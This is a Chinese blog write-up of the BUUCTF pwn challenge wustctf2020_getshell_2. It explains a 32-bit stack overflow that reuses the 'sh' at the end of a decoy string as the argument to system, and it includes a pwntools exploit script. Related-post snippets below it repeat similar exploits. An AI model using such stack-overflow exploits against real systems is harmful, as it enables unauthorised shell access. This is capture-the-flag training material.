wustctf2020_getshell_2

最新推荐文章于 2024-02-07 03:42:45 发布
最新推荐文章于 2024-02-07 03:42:45 发布
阅读量2.2k 收藏 2
点赞数
分类专栏: BUU-PWN 文章标签: 安全 系统安全 pwn 网络安全 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0sway/article/details/121899924
版权
本文讲述了在WUSTCCTF2020_getshell_2任务中,通过检查和IDA分析发现了一个栈溢出漏洞。挑战者需利用system函数的间接调用,避开直接写'/bin/sh',找到隐藏的后门地址。作者详细介绍了利用ROP技术和payload构造过程,最终实现远程shell获取。
摘要由CSDN通过智能技术生成

wustctf2020_getshell_2

使用checksec查看:
在这里插入图片描述
只开启了栈不可执行,应该和1一样是道栈溢出题目。

放进IDA中查看:
在这里插入图片描述
在这里插入图片描述
和1一样主函数中给出漏洞函数,漏洞函数中直接一个栈溢出。

但是后门函数并没有直接给出system(/bin/sh),而是给了system("/bbbbbbbbin_what_the_f?ck__--??/sh")

这样就不能直接调用后门函数进行getshell。虽然没有给/bin/sh,但是这串字符串的最后sh可以用作参数,同样可以获取到shell。

记录下地址:0x08048670
在这里插入图片描述
也可以使用ROPgadget直接找出地址:
在这里插入图片描述

但是没法利用system@plt地址,因为plt地址需要返回值,可溢出的地址位数不够0x24-0x18=0xc,所以只能用shell()里的call system来调用system,call函数不用返回值了,它会自己把下一条指令给压进去

exp:

from pwn import *

#start
r = remote("node4.buuoj.cn",29609)
# r = process("../buu/wustctf2020_getshell_2")

#params
sh_addr = 0x08048670
system_addr = 0x08048529

#attack
payload = b'M'*(0x18+4) + p32(system_addr) + p32(sh_addr)
r.recv()
r.sendline(payload)

r.interactive()
m0sway
关注
专栏目录
buuctf wustctf2020_getshell_2 ret2shellcode
weixin_45441024的博客
12-01 696
BUUCTF wustctf2020_getshell_2 check一下,32位的程序且没有开任何保护 用ida打开,vuln很明显这是一个漏洞函数,f5查看一下伪代码,可以看到buf距离栈底0x18个字节 这是shell函数的伪代码,我们可以看到虽然这个并不是我们想要的shell(不是/bin/sh),但是程序里面有sh的字符串可以供我们利用,那我们现在就查找一下"sh"所在的位置 $ ROPgadget --binary '/home/pwn/Desktop/wustctf2020_getshe
wustctf2020_getshell
m0sway的博客
11-28 804
wustctf2020_getshell 使用checksec查看: 只开启了一个栈不可执行,没开Canary,考虑栈溢出题目。 拉进IDA中查看: 主函数中直接给漏洞函数,跟进: read()函数,能读取0x20的数据,buf距离ebp0x18,因为这是个32位的程序,ebp+4后还能放下一个one_gadget 首先考虑下这个程序本身有没有get_shell的函数,通过搜索字符串可以发现函数shell(): ok了,这题直接秒了。 exp: from pwn import * #start
[buuctf]wustctf2020_getshell_2
逆向萌新的博客
07-03 369
[buuctf]wustctf2020_getshell_2
[BUUCTF-pwn]——wustctf2020_getshell_2
Y_peak的博客
03-19 457
[BUUCTF-pwn]——wustctf2020_getshell_2 有system没有sh。所以找一下 exploit from pwn import * p = remote('node3.buuoj.cn',25464) sh = 0x08048670 payload = 'a' * (0x18 + 4) + p32(0x08048529) + p32(sh) p.sendline(payload) p.interactive()
BUUCTF pwn——wustctf2020_getshell_2
CNS-Enterprise BCC-1701-J
05-23 174
BUUCTF 做题练习
BUUCTF pwn水题大赏(七)(更新中)
o琦野o的博客
04-02 187
BUUCTF pwn水题大赏wustctf2020_getshell wustctf2020_getshell 简单 32 位栈溢出。 exp: from pwn import* context.log_level = 'DEBUG' p=remote('node3.buuoj.cn',28411) #p=process('./wustctf2020_getshell') backdoor = 0x0804851B payload = 'a'*0x18+'a'*4+p32(backdoor) p.sen
WUST-CTF2020(武汉科技大学第一届"WUST-CTF"网络安全竞赛)WP
weixin_45461609的博客
03-30 3639
WUST-CTF2020Webcheck inadmin(不会web勉强做出)PWNgetshellgetshell2number gameCrypto大数运算B@se情书babyrsa佛说:只能四天MISC比赛规则Space ClubWelcomegirlfriend爬ShopRECr0ssFunlevel1level2level3 Web check in 修改maxlength,删除按钮的d...
BUUOJ PWN 61-80
2h4ox1n9
12-17 284
61\
[BUUCTF]PWN——wustctf2020_getshell1/2
mcmuyanga的博客
11-11 1322
wustctf2020_getshell 附件 步骤: 例行检查,32位程序,开启了NX保护 本地试运行一下程序,看看大概的情况 32位ida载入,习惯性的检索程序里的字符串,发现了后门函数 shell_addr=0x804851B main函数开始看程序 vulnerable函数 buf参数存在溢出漏洞,正好溢出8位,让我们覆盖到ret exp: from pwn import* r=remote('node3.buuoj.cn',29690) shell_addr=0x804851B
[buuctf]wustctf2020_getshell
逆向萌新的博客
07-02 702
[buuctf]wustctf2020_getshell
[WUSTCTF 2020]getshell
沈理大学牲的博客
11-14 195
发现后门函数 shell,并且在vuin函数存在栈溢出。file 和checksec 检查文件。一道简单的ret2text。
pwn旅行之[WUSTCTF 2020]getshell2(一些小知识)
最新发布
qq_66013948的博客
02-07 585
Linux下查找文件(find、grep命令)_linux查找文件-CSDN博客find 路径 -name "文件名"之后就是根据题目猜测flag文件的名字,最后通过上一条语句进行查找,当然,如果猜不到,那么还是只有挨个找了。
[BUUCTF-pwn]——wustctf2020_getshell
Y_peak的博客
03-16 199
[BUUCTF-pwn]——wustctf2020_getshell 额,太简单了直接上exploit吧 直接利用栈溢出,修改返回地址就好 from pwn import * p = remote('node3.buuoj.cn',28241) payload = 'a' * (0x18+4) + p32(0x0804851B) p.send(payload) p.interactive()
hadoop_getshell
09-05
hadoop_getshell指的是利用Hadoop漏洞获取系统shell权限。Hadoop是一个开放源代码的分布式存储和计算框架,被广泛应用于大数据处理。但是,由于Hadoop的复杂性和开放性,可能存在各种漏洞和安全风险。 Hadoop_getshell通常是通过利用Hadoop的可远程读写文件的特性进行的攻击。攻击者利用该特性上传恶意的Jar文件,这个Jar文件包含了指令,能够执行系统命令,从而获取到服务器的shell权限。 一旦攻击者成功获取到shell权限,他们就可以在系统中执行各种操作,包括但不限于查看、修改、删除敏感数据,制造破坏或者窃取敏感信息。 防范hadoop_getshell攻击的关键是加强Hadoop集群的安全性。以下是一些常见的防御措施: 1. 及时更新Hadoop的版本和补丁,以修复已知的安全漏洞。 2. 限制Hadoop集群的访问权限。只有授权用户才能访问和操作集群。 3. 配置防火墙,限制对Hadoop集群的外部访问。 4. 定期审查Hadoop集群的日志,寻找异常行为和潜在的安全威胁。 5. 定期进行安全扫描和漏洞扫描,发现潜在的安全漏洞并及时修复。 6. 加强系统的监控和入侵检测,及时发现并应对异常活动。 7. 对Hadoop集群进行访问控制,使用强密码、多因素认证等加固账户安全。 8. 监控网络流量,发现并阻止异常的数据传输行为。 9. 定期进行安全培训和意识提升,提高员工对安全风险和攻击手段的认知。 总之,要防范hadoop_getshell攻击,需要综合应用多种防御措施,不断加强Hadoop集群的安全性,保护好大数据环境中的敏感信息。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值